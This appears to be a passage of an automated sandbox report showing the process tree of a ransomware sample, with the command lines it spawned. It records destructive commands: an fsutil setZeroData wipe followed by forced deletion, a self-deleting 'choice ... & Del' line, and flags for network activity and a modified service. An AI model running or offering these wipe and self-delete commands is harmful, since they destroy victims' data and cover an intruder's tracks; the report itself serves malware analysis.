      - Blacklisted process makes network request
      PID: 4868

   2⤵ C:\Windows\SYSTEM32\cmd.exe
      Command line: "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
      PID: 4196

      3⤵ C:\Windows\system32\PING.EXE
         Command line: ping 127.0.0.7 -n 3
         - Runs ping.exe
         PID: 2820

      3⤵ C:\Windows\system32\fsutil.exe
         Command line: fsutil file setZeroData offset=0 length=524288 “%s”
         PID: 2784

   2⤵ C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\safeboot network ransomware.exe
      PID: 2592

      3⤵ C:\Windows\system32\choice.exe
         Command line: choice /C Y /N /D Y /T 3
         PID: 3964

1⤵ C:\Windows\system32\vssvc.exe
   Command line: C:\Windows\system32\vssvc.exe
   - Modifies service
   PID: 5292